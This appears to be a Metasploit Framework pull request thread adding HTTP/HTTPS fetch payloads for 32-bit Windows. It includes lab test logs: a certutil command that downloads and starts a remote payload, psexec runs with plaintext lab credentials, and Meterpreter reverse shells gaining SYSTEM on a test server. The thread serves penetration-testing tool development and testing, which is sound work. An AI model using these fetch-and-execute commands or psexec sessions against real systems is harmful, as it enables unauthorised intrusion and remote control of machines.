Add HTTP and HTTPS fetch payloads for Windows x86

[bwatters-r7]

I'm lazy and added this to make testing the Indirect Syscall easier; I figured I'd go ahead and PR it.

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/windows/http/x86/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      LFVuldXrQS       no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH       x                no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


View the full module info with the info, or info -d command.

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > to_handler
[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/x %TEMP%\qgWXjldDTi.exe & start /B %TEMP%\qgWXjldDTi.exe
[*] Payload Handler Started as Job 0
msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.189 requested /x
[*] Sending payload to 10.5.132.189 (Microsoft-CryptoAPI/6.1)
[*] Client 10.5.132.189 requested /x
[*] Sending payload to 10.5.132.189 (CertUtil URL Agent)
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (200774 bytes) to 10.5.132.189
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.189:49249) at 2026-03-23 15:49:01 -0500

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : MSFUSER-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

[bwatters-r7]

Sigh. Gotta leave specs for config files, I guess.

[smcintyre-r7]

This looks easy enough to land. @bwatters-r7 I think if you rebase this to pull in the latest changes from master, the PHP macos tests should start passing. You'll also get the fix to the payload cached size update script which should fix the cache size failures, though on looking at them I would not have guessed that these changes would have triggered those failures.

[bwatters-r7]

@smcintyre-r7 I'm not sure that the payload_cached error is related. I can run that test locally and sometimes it passes, and sometimes, it fails?

tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ bundle exec rspec spec/lib/msf/core/payload_spec.rb
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
Run options:
  include {:focus=>true}
  exclude {:acceptance=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 40303
Msf::Payload ../home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:45: warning: already initialized constant CachedSize
/home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:31: warning: previous definition of CachedSize was here
./home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:19: warning: already initialized constant CachedSize
/home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:45: warning: previous definition of CachedSize was here
.F

  1) Msf::Payload.cached_size when CachedSize is not defined returns nil
     Failure/Error: expect(klass.cached_size).to be_nil
     
       expected: nil
            got: 123
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-support-3.13.6/lib/rspec/support.rb:110:in `block in <module:Support>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-support-3.13.6/lib/rspec/support.rb:119:in `notify_failure'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/fail_with.rb:35:in `fail_with'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/handler.rb:39:in `handle_failure'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/handler.rb:55:in `block in handle_matcher'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/handler.rb:26:in `with_matcher'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/handler.rb:47:in `handle_matcher'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/expectation_target.rb:65:in `to'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-expectations-3.13.5/lib/rspec/expectations/expectation_target.rb:101:in `to'
     # ./spec/lib/msf/core/payload_spec.rb:12:in `block (4 levels) in <top (required)>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:263:in `instance_exec'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:263:in `block in run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:511:in `block in with_around_and_singleton_context_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:468:in `block in with_around_example_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:486:in `block in run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:626:in `block in run_around_example_hooks_for'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:352:in `call'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-rails-8.0.2/lib/rspec/rails/adapters.rb:75:in `block (2 levels) in <module:MinitestLifecycleAdapter>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:457:in `instance_exec'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:457:in `instance_exec'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:390:in `execute_with'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:628:in `block (2 levels) in run_around_example_hooks_for'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:352:in `call'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:629:in `run_around_example_hooks_for'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/hooks.rb:486:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:468:in `with_around_example_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:511:in `with_around_and_singleton_context_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example.rb:259:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:653:in `block in run_examples'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:649:in `map'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:649:in `run_examples'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:614:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `block in run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `map'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `block in run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `map'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/example_group.rb:615:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:121:in `block (3 levels) in run_specs'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:121:in `map'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:121:in `block (2 levels) in run_specs'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/configuration.rb:2097:in `with_suite_hooks'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:116:in `block in run_specs'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/reporter.rb:74:in `report'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:115:in `run_specs'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:89:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:71:in `run'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/lib/rspec/core/runner.rb:45:in `invoke'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/gems/rspec-core-3.13.5/exe/rspec:4:in `<top (required)>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/bin/rspec:25:in `load'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/bin/rspec:25:in `<main>'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/bin/ruby_executable_hooks:22:in `eval'
     # /home/tmoose/.rvm/gems/ruby-3.3.8@metasploit-framework/bin/ruby_executable_hooks:22:in `<main>'

Top 5 slowest examples (0.07305 seconds, 29.7% of total time):
  Msf::Payload.cached_size when CachedSize is defined as :dynamic returns nil
    0.03989 seconds ./spec/lib/msf/core/payload_spec.rb:35
  Msf::Payload#cached_size delegates to .cached_size
    0.02753 seconds ./spec/lib/msf/core/payload_spec.rb:61
  Msf::Payload.cached_size when CachedSize is not defined returns nil
    0.00214 seconds ./spec/lib/msf/core/payload_spec.rb:11
  Msf::Payload.cached_size when class is a Stager and CachedSizeOverrides is defined returns the override value for the stager refname
    0.00186 seconds ./spec/lib/msf/core/payload_spec.rb:54
  Msf::Payload.cached_size when CachedSize is defined as an integer returns the integer value
    0.00162 seconds ./spec/lib/msf/core/payload_spec.rb:23

Finished in 0.24611 seconds (files took 2.83 seconds to load)
5 examples, 1 failure

Failed examples:

rspec ./spec/lib/msf/core/payload_spec.rb:11 # Msf::Payload.cached_size when CachedSize is not defined returns nil

Randomized with seed 40303
Coverage report generated for RSpec to /home/tmoose/rapid7/metasploit-framework/coverage.
Line Coverage: 18.49% (2565 / 13875)
SimpleCov failed with exit 1
[ruby-3.3.8@metasploit-framework](feature/x86_windows_fetch) tmoose@ubuntu-dev2024:~/rapid7/metasploit-framework$ bundle exec rspec spec/lib/msf/core/payload_spec.rb
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
Run options:
  include {:focus=>true}
  exclude {:acceptance=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 13797
Msf::Payload ../home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:31: warning: already initialized constant CachedSize
/home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:45: warning: previous definition of CachedSize was here
./home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:19: warning: already initialized constant CachedSize
/home/tmoose/rapid7/metasploit-framework/spec/lib/msf/core/payload_spec.rb:31: warning: previous definition of CachedSize was here
..

Top 5 slowest examples (0.06189 seconds, 30.5% of total time):
  Msf::Payload.cached_size when CachedSize is not defined returns nil
    0.03976 seconds ./spec/lib/msf/core/payload_spec.rb:11
  Msf::Payload#cached_size delegates to .cached_size
    0.01065 seconds ./spec/lib/msf/core/payload_spec.rb:61
  Msf::Payload.cached_size when CachedSize is defined as :dynamic returns nil
    0.00415 seconds ./spec/lib/msf/core/payload_spec.rb:35
  Msf::Payload.cached_size when CachedSize is defined as an integer returns the integer value
    0.0038 seconds ./spec/lib/msf/core/payload_spec.rb:23
  Msf::Payload.cached_size when class is a Stager and CachedSizeOverrides is defined returns the override value for the stager refname
    0.00353 seconds ./spec/lib/msf/core/payload_spec.rb:54

Finished in 0.20311 seconds (files took 2.79 seconds to load)
5 examples, 0 failures

Randomized with seed 13797
Coverage report generated for RSpec to /home/tmoose/rapid7/metasploit-framework/coverage.
Line Coverage: 18.49% (2565 / 13875)

[smcintyre-r7]

Changes look good, tests are passing and both x86 HTTP and HTTPs are working

msf exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Payload options (cmd/windows/http/x86/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      sNmzAYoP         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.227  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf exploit(windows/smb/psexec) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49727) at 2026-03-31 11:46:19 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\sCoOOlxASHS.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/https/x86/meterpreter_reverse_tcp
PAYLOAD => cmd/windows/https/x86/meterpreter_reverse_tcp
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:49734) at 2026-03-31 11:46:37 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\BUPBGDNjeF.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 2

[*] 192.168.159.10 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Payload options (cmd/windows/https/x86/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_CHECK_CERT    false            yes       Check SSL certificate
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      acbPkCHOlaY      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf exploit(windows/smb/psexec) >

[smcintyre-r7]

If the purpose of this is to set the default for HTTP then I think this should be redundant and able to be removed because you set the default on L16. I think this would only be necessary if either there's a bug and 'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' }, isn't working or you need to adjust the available binaries.

[bwatters-r7]

I broke my own specs...... 😆

[smcintyre-r7]

Tested all 4 payloads with their default FETCH_COMMAND on a Server 2019 target. All the tests passed, all the CI tests are passing and the changes make sense so I'm going to go ahead an merge this in.

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Payload options (cmd/windows/https/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_CHECK_CERT    false            yes       Check SSL certificate
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      UpVFakHojgGq     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.227  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.227:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (192.168.250.227:4444 -> 192.168.250.89:61894) at 2026-04-01 14:30:02 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\EEtoXVqiauOsWNgl.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/https/x86/meterpreter_reverse_tcp
PAYLOAD => cmd/windows/https/x86/meterpreter_reverse_tcp
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.227:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 2 opened (192.168.250.227:4444 -> 192.168.250.89:57472) at 2026-04-01 14:30:55 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\XvDGTAexlGCd.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 2

[*] 192.168.159.10 - Meterpreter session 2 closed.  Reason: User exit
[*] 192.168.159.10 - Meterpreter session 2 closed.  Reason: Died
msf exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/http/x86/meterpreter_reverse_tcp
PAYLOAD => cmd/windows/http/x86/meterpreter_reverse_tcp
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.227:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 3 opened (192.168.250.227:4444 -> 192.168.250.89:55212) at 2026-04-01 14:31:40 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\SLYtMOatookFpT.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 3

[*] 192.168.159.10 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/http/x64/meterpreter_reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter_reverse_tcp
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.227:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 4 opened (192.168.250.227:4444 -> 192.168.250.89:55354) at 2026-04-01 14:33:15 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\XlLZuWCT.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 4

[*] 192.168.159.10 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > 

[smcintyre-r7]

Release Notes

This adds HTTP and HTTPS fetch payloads for 32-bit Windows targets.